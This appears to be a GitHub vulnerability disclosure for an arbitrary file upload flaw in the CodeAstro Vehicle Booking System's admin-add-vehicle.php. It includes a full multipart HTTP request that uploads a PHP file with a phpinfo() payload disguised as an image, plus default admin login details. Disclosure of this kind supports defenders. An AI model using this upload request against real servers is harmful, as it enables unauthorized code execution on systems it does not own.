Skip to content

Latest commit

 

History

History
88 lines (61 loc) · 3.08 KB

RCE-2.md

File metadata and controls

88 lines (61 loc) · 3.08 KB
Raw

Vulnerability Description

Arbitrary file upload vulnerability in Vehicle Booking System v1.0 allows attackers to execute arbitrary code via the file upload to admin-add-vehicle.php. It is an open source project from https://codeastro.com .

  1. Vulnerability Submitter: Tr0e

  2. vendors: Vehicle Booking System in PHP with Source Code - CodeAstro

  3. The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;

  4. Vulnerability location: /VehicleBooking-PHP/admin/admin-add-vehicle.php

Vulnerability Verification

[+] Payload:

<?php phpinfo();?>

POC:

POST http://192.168.0.120:91/VehicleBooking-PHP/admin/admin-add-vehicle.php HTTP/1.1
Host: 192.168.0.120:91
Content-Length: 895
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.120:91
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHwRD9k9A7fnBXCiu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.120:91/VehicleBooking-PHP/admin/admin-add-vehicle.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=ldi7mdlvm8g7bnfhunuvrhp8ne
Connection: close

------WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content-Disposition: form-data; name="v_name"

Test
------WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content-Disposition: form-data; name="v_reg_no"

aaa
------WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content-Disposition: form-data; name="v_pass_no"

111
------WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content-Disposition: form-data; name="v_driver"

Demo User
------WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content-Disposition: form-data; name="v_category"

Bus
------WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content-Disposition: form-data; name="v_status"

Booked
------WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content-Disposition: form-data; name="v_dpic"; filename="Tr0e.php"
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content-Disposition: form-data; name="add_veh"


------WebKitFormBoundaryHwRD9k9A7fnBXCiu--

How to verify

  1. Build the vulnerability environment according to the steps provided by the source code author.
  2. log in to the background management system through the default account and password(Email: [email protected] Password: codeastro.com);
  3. The vulnerability lies in the "Vehicles - Add - Add Vehicle" function, you should inserts Payload when you Add Vehicle, as shown in the following figure: image image image